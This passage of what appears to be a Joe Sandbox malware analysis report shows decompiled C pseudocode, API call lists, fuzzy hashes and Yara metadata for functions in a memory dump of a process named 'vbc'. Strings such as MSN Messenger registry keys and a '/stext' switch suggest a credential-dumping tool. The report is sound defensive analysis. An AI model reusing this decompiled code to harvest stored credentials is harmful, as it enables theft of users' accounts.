                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                    • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                                                                                                    • API String ID: 1910562259-1741179510
                                                                                                                                                    • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                                                                                    • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                                                                                                                    • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                                                                                    • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040ED0B Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 439 40ed0b-40ed22 FindResourceA 440 40ed24-40ed33 SizeofResource 439->440 441 40ed89-40ed8e 439->441 442 40ed35-40ed41 LoadResource 440->442 443 40ed88 440->443 442->443 444 40ed43-40ed4c LockResource 442->444 443->441 444->443 445 40ed4e-40ed5c 444->445 446 40ed7a-40ed83 445->446 447 40ed5e 445->447 446->443 448 40ed5f-40ed77 447->448 448->448 449 40ed79 448->449 449->446
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								 *0x417110 =  *0x417110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}











                                                                                                                                                    0x0040ed18
                                                                                                                                                    0x0040ed1e
                                                                                                                                                    0x0040ed22
                                                                                                                                                    0x0040ed2f
                                                                                                                                                    0x0040ed33
                                                                                                                                                    0x0040ed39
                                                                                                                                                    0x0040ed41
                                                                                                                                                    0x0040ed44
                                                                                                                                                    0x0040ed4c
                                                                                                                                                    0x0040ed50
                                                                                                                                                    0x0040ed53
                                                                                                                                                    0x0040ed56
                                                                                                                                                    0x0040ed58
                                                                                                                                                    0x0040ed58
                                                                                                                                                    0x0040ed5c
                                                                                                                                                    0x0040ed5f
                                                                                                                                                    0x0040ed6f
                                                                                                                                                    0x0040ed71
                                                                                                                                                    0x0040ed75
                                                                                                                                                    0x0040ed75
                                                                                                                                                    0x0040ed79
                                                                                                                                                    0x0040ed83
                                                                                                                                                    0x0040ed83
                                                                                                                                                    0x0040ed4c
                                                                                                                                                    0x0040ed41
                                                                                                                                                    0x0040ed88
                                                                                                                                                    0x0040ed8e

                                                                                                                                                    APIs
                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                    • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                                                                                    • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                                                                                                                    • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                                                                                    • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EA72 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
				void _v8199;
				char _v8200;
				void* __ebx;
				int _t23;
				CHAR* _t31;

				E004118A0(0x2004, __ecx);
				_v8200 = 0;
				if(_a4 == 0) {
					memset( &_v8199, 0, 0x2000);
					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
					_t23 = E004067DC( &_v8200, __edi, _a16);
				} else {
					memset( &_v8199, 0, 0x2000);
					_t31 =  &_v8200;
					E00406763(_t31, _a16,  *__edi);
					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
				}
				return _t23;
			}








                                                                                                                                                    0x0040ea7a
                                                                                                                                                    0x0040ea85
                                                                                                                                                    0x0040ea8b
                                                                                                                                                    0x0040ead5
                                                                                                                                                    0x0040eaf3
                                                                                                                                                    0x0040eb03
                                                                                                                                                    0x0040ea8d
                                                                                                                                                    0x0040ea9a
                                                                                                                                                    0x0040eaa1
                                                                                                                                                    0x0040eaaa
                                                                                                                                                    0x0040eabe
                                                                                                                                                    0x0040eabe
                                                                                                                                                    0x0040eb0d

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040EA9A
                                                                                                                                                      • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                                                                                                      • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                                                                                                                    • memset.MSVCRT ref: 0040EAD5
                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                    • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                                                                                    • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                                                                                                                    • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                                                                                    • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B785 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				struct HICON__* _t19;
				intOrPtr* _t23;
				void* _t25;

				_t23 = __ebx;
				_t14 = __eax;
				 *((intOrPtr*)(__ebx + 0x124)) = 0;
				 *__ebx = 0x41356c;
				 *((intOrPtr*)(__ebx + 0x258)) = 0;
				_push(0x14);
				 *((intOrPtr*)(__ebx + 0x374)) = 0;
				L004115D0();
				if(__eax == 0) {
					_t14 = 0;
					__eflags = 0;
				} else {
					 *0x417114 = __eax;
				}
				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
				L004115D0(); // executed
				_t32 = _t14;
				_t25 = 0xf38;
				if(_t14 == 0) {
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = E00404016(_t14, _t32);
				}
				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
				 *((intOrPtr*)(_t23 + 0x378)) = 0;
				 *((intOrPtr*)(_t23 + 0x260)) = 0;
				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
				 *((intOrPtr*)(_t23 + 0x154)) = 0;
				_t16 =  *(_t23 + 0x258);
				if(_t16 != 0) {
					DeleteObject(_t16);
					 *(_t23 + 0x258) = 0;
				}
				_t17 = E00406252(); // executed
				 *(_t23 + 0x258) = _t17;
				E00401000(_t25, _t23 + 0x158, 0x413480);
				_t19 = LoadIconA( *0x416b94, 0x65); // executed
				E004017A4(_t23, _t19);
				return _t23;
			}












                                                                                                                                                    0x0040b785
                                                                                                                                                    0x0040b785
                                                                                                                                                    0x0040b789
                                                                                                                                                    0x0040b78f
                                                                                                                                                    0x0040b795
                                                                                                                                                    0x0040b79b
                                                                                                                                                    0x0040b79d
                                                                                                                                                    0x0040b7a3
                                                                                                                                                    0x0040b7ab
                                                                                                                                                    0x0040b7b4
                                                                                                                                                    0x0040b7b4
                                                                                                                                                    0x0040b7ad
                                                                                                                                                    0x0040b7ad
                                                                                                                                                    0x0040b7ad
                                                                                                                                                    0x0040b7bb
                                                                                                                                                    0x0040b7c1
                                                                                                                                                    0x0040b7c6
                                                                                                                                                    0x0040b7c8
                                                                                                                                                    0x0040b7c9
                                                                                                                                                    0x0040b7d4
                                                                                                                                                    0x0040b7d4
                                                                                                                                                    0x0040b7cb
                                                                                                                                                    0x0040b7cd
                                                                                                                                                    0x0040b7cd
                                                                                                                                                    0x0040b7d6
                                                                                                                                                    0x0040b7dc
                                                                                                                                                    0x0040b7e2
                                                                                                                                                    0x0040b7e8
                                                                                                                                                    0x0040b7ee
                                                                                                                                                    0x0040b7f4
                                                                                                                                                    0x0040b7fc
                                                                                                                                                    0x0040b7ff
                                                                                                                                                    0x0040b805
                                                                                                                                                    0x0040b805
                                                                                                                                                    0x0040b80b
                                                                                                                                                    0x0040b81b
                                                                                                                                                    0x0040b821
                                                                                                                                                    0x0040b82e
                                                                                                                                                    0x0040b837
                                                                                                                                                    0x0040b840

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1986663749-0
                                                                                                                                                    • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                                                                                    • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                                                                                                                    • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                                                                                    • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411932 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                    			E00411932() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x417528;
				if(_t1 != 0) {
					_push(_t1);
					L004115D6();
				}
				_t2 =  *0x417530;
				if(_t2 != 0) {
					_push(_t2); // executed
					L004115D6(); // executed
				}
				_t3 =  *0x41752c;
				if(_t3 != 0) {
					_push(_t3);
					L004115D6();
				}
				_t4 =  *0x417534;
				if(_t4 != 0) {
					_push(_t4); // executed
					L004115D6(); // executed
					return _t4;
				}
				return _t4;
			}







                                                                                                                                                    0x00411932
                                                                                                                                                    0x00411939
                                                                                                                                                    0x0041193b
                                                                                                                                                    0x0041193c
                                                                                                                                                    0x00411941
                                                                                                                                                    0x00411942
                                                                                                                                                    0x00411949
                                                                                                                                                    0x0041194b
                                                                                                                                                    0x0041194c
                                                                                                                                                    0x00411951
                                                                                                                                                    0x00411952
                                                                                                                                                    0x00411959
                                                                                                                                                    0x0041195b
                                                                                                                                                    0x0041195c
                                                                                                                                                    0x00411961
                                                                                                                                                    0x00411962
                                                                                                                                                    0x00411969
                                                                                                                                                    0x0041196b
                                                                                                                                                    0x0041196c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00411971
                                                                                                                                                    0x00411972

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                                                                                    • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                                                                                                                    • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                                                                                    • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040787D Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                    			E0040787D() {
				void* _t13;
				signed int _t16;
				signed int _t18;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;

				_t33 =  *0x417540;
				if(_t33 == 0) {
					_push(0x8000);
					 *0x417540 = 0x8000;
					 *0x417544 = 0x100;
					 *0x417548 = 0x1000; // executed
					L004115D0(); // executed
					 *0x417528 = 0x8000;
					_t27 = 4;
					_t16 =  *0x417544 * _t27;
					_push( ~(0 | _t33 > 0x00000000) | _t16);
					L004115D0();
					 *0x417530 = _t16;
					_t29 = 4;
					_t18 =  *0x417544 * _t29;
					_push( ~(0 | _t33 > 0x00000000) | _t18);
					L004115D0();
					_push( *0x417548);
					 *0x417534 = _t18; // executed
					L004115D0(); // executed
					 *0x41752c = _t18;
					return _t18;
				}
				return _t13;
			}









                                                                                                                                                    0x0040787d
                                                                                                                                                    0x00407884
                                                                                                                                                    0x0040788b
                                                                                                                                                    0x0040788c
                                                                                                                                                    0x00407891
                                                                                                                                                    0x0040789b
                                                                                                                                                    0x004078a5
                                                                                                                                                    0x004078aa
                                                                                                                                                    0x004078b8
                                                                                                                                                    0x004078b9
                                                                                                                                                    0x004078c2
                                                                                                                                                    0x004078c3
                                                                                                                                                    0x004078c8
                                                                                                                                                    0x004078d6
                                                                                                                                                    0x004078d7
                                                                                                                                                    0x004078e0
                                                                                                                                                    0x004078e1
                                                                                                                                                    0x004078e6
                                                                                                                                                    0x004078ec
                                                                                                                                                    0x004078f1
                                                                                                                                                    0x004078f9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004078f9
                                                                                                                                                    0x004078fe

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                    • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                                                                                    • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                                                                                                                    • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                                                                                    • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004060FA Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                                                    0x004060fa
                                                                                                                                                    0x004060fb
                                                                                                                                                    0x004060ff
                                                                                                                                                    0x0040614a
                                                                                                                                                    0x00406101
                                                                                                                                                    0x00406102
                                                                                                                                                    0x00406104
                                                                                                                                                    0x00406108
                                                                                                                                                    0x0040610a
                                                                                                                                                    0x0040610c
                                                                                                                                                    0x00406116
                                                                                                                                                    0x0040611e
                                                                                                                                                    0x00406120
                                                                                                                                                    0x00406124
                                                                                                                                                    0x0040612e
                                                                                                                                                    0x00406133
                                                                                                                                                    0x00406137
                                                                                                                                                    0x0040613c
                                                                                                                                                    0x00406146
                                                                                                                                                    0x00406146

                                                                                                                                                    APIs
                                                                                                                                                    • malloc.MSVCRT ref: 00406116
                                                                                                                                                    • memcpy.MSVCRT ref: 0040612E
                                                                                                                                                    • free.MSVCRT(00000000,00000000,75144DE0,00406B49,00000001,?,00000000,75144DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                    • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                                                                                    • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                                                                                                                    • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                                                                                    • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B8D7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E0040B8D7(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t54 = __eflags;
				_t49 = __edi;
				_t38 = 0;
				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
				_t24 =  *((intOrPtr*)(__edi + 0x37c));
				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
					_t51 = 0x412466;
				} else {
					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
					}
					_t51 = _t45;
				}
				_push(_t51);
				_push("/stext");
				L004115B2();
				if(_t24 != 0) {
					_t52 = E0040B841(_t24, _t51);
					__eflags = _t52 - _t38;
					if(_t52 <= _t38) {
						goto L15;
					}
					goto L9;
				} else {
					_t52 = 1;
					L9:
					E0040AF17(_t49, _t38); // executed
					E0040A5AC(_t49);
					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
						_t42 = 0x412466;
					} else {
						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
							_t42 = 0;
						} else {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
					_t38 = 1;
					E0040B0C2(_t49);
					L15:
					return _t38;
				}
			}












                                                                                                                                                    0x0040b8d7
                                                                                                                                                    0x0040b8d7
                                                                                                                                                    0x0040b8e0
                                                                                                                                                    0x0040b8e4
                                                                                                                                                    0x0040b8f5
                                                                                                                                                    0x0040b8fb
                                                                                                                                                    0x0040b900
                                                                                                                                                    0x0040b909
                                                                                                                                                    0x0040b920
                                                                                                                                                    0x0040b90b
                                                                                                                                                    0x0040b90e
                                                                                                                                                    0x0040b91a
                                                                                                                                                    0x0040b91a
                                                                                                                                                    0x0040b910
                                                                                                                                                    0x0040b915
                                                                                                                                                    0x0040b915
                                                                                                                                                    0x0040b91c
                                                                                                                                                    0x0040b91c
                                                                                                                                                    0x0040b925
                                                                                                                                                    0x0040b926
                                                                                                                                                    0x0040b92b
                                                                                                                                                    0x0040b934
                                                                                                                                                    0x0040b940
                                                                                                                                                    0x0040b942
                                                                                                                                                    0x0040b944
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b936
                                                                                                                                                    0x0040b938
                                                                                                                                                    0x0040b946
                                                                                                                                                    0x0040b949
                                                                                                                                                    0x0040b950
                                                                                                                                                    0x0040b955
                                                                                                                                                    0x0040b95f
                                                                                                                                                    0x0040b976
                                                                                                                                                    0x0040b961
                                                                                                                                                    0x0040b961
                                                                                                                                                    0x0040b965
                                                                                                                                                    0x0040b972
                                                                                                                                                    0x0040b967
                                                                                                                                                    0x0040b96d
                                                                                                                                                    0x0040b96d
                                                                                                                                                    0x0040b965
                                                                                                                                                    0x0040b98b
                                                                                                                                                    0x0040b998
                                                                                                                                                    0x0040b9a1
                                                                                                                                                    0x0040b9a2
                                                                                                                                                    0x0040b9a8
                                                                                                                                                    0x0040b9ac
                                                                                                                                                    0x0040b9ac

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                                                                                                                      • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                                                                                                                      • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                                                                                                                      • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                                                                                                                      • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                                                                                                                    • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen$_stricmpmemset
                                                                                                                                                    • String ID: /stext
                                                                                                                                                    • API String ID: 3575250601-3817206916
                                                                                                                                                    • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                                                                                    • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                                                                                                                    • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                                                                                    • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406252 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406252() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406191( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}





                                                                                                                                                    0x00406264
                                                                                                                                                    0x00406270
                                                                                                                                                    0x00406277

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                                                                                      • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFontIndirectmemsetstrcpy
                                                                                                                                                    • String ID: Arial
                                                                                                                                                    • API String ID: 3275230829-493054409
                                                                                                                                                    • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
